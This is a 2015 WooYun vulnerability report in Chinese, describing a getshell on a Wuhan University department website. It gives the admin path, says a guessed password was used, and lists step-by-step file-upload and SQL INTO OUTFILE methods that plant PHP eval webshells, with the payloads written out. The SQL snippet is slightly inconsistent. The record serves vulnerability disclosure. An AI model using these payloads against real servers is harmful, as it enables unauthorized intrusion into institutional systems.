当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090985

漏洞标题:武汉大学党委组织部、党校主站getshell

相关厂商:武汉大学

漏洞作者: WEAINE

提交时间:2015-01-13 10:54

修复时间:2015-02-27 10:56

公开时间:2015-02-27 10:56

漏洞类型:文件上传导致任意代码执行

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-02-27: 细节向公众公开

简要描述:

getshell

详细说明:

后台是http://zzb.whu.edu.cn/e/admin/,虽然不是什么标准的弱口令,但我还是猜出来了,你们猜猜看。
进入后台以后,首先模板管理-增加自定义模板这里可以在任意位置创建php页面并执行,不过如果在这里造马总是提交不成。
类似于图片上传、下载文件上传这里都把后缀php加进黑名单了,同时又自动改名。
把马改成.jpg传上去,再去模板管理那里include进去,又提交不成。
然后去系统设置-管理数据表与系统模型-管理数据表这里,选一个管理系统模型,再在新页面里选导入系统模型,来到http://zzb.whu.edu.cn/e/admin/db/LoadInM.php,这里可以传后缀.mod的文件,建一个文件写入

<?fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>")?>

保存成xxx.php.mod传上去,会让提示你没选数据表,其实已经传上去了。

<form action="../ecmsmod.php" method="post" enctype="multipart/form-data" name="form1" onsubmit="return confirm('确认要导入?');">
<table width="100%" border="0" align="center" cellpadding="3" cellspacing="1" class="tableborder">
<tr>
<td height="25" colspan="2" class="header">导入系统模型</td>
</tr>
<tr>
<td width="28%" height="25" bgcolor="#FFFFFF">存放的数据表名:</td>
<td width="72%" height="25" bgcolor="#FFFFFF"><strong>zzb_ecms_</strong>
<input name="tbname" type="text" id="tbname">
</td>
</tr>
<tr>
<td height="25" bgcolor="#FFFFFF">选择导入模型文件:</td>
<td height="25" bgcolor="#FFFFFF"><input type="file" name="file">
*.mod</td>
</tr>
<tr>
<td height="25" bgcolor="#FFFFFF">&nbsp;</td>
<td height="25" bgcolor="#FFFFFF"> <input type="submit" name="Submit" value="马上导入">
<input type="reset" name="Submit2" value="重置">
<input name="enews" type="hidden" id="enews" value="LoadInMod">
</td>
</tr>
</table>
</form>


看源码可以知道x.php建在了ecmsmod.php同目录。
再去系统设置-备份与恢复数据-执行SQL语句这里,执行

create table x (xx text not null);
insert into x (xx) values('<?php eval($_POST[xxx])?>');
select cmd from temp into outfile ' D:/EmpireServer/newweb/xxxx.php';
drop table if exists x;


D:/EmpireServer/newweb/是它网站根目录,这样就在根目录建了个xxxx.php,菜刀连就好了。

漏洞证明:

捕获.PNG

修复方案:

不如不用这么屌的后台。

捕获1.PNG

版权声明:转载请注明来源 WEAINE@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-16 16:58

厂商回复:

正在通知相关学校处理

最新状态:

暂无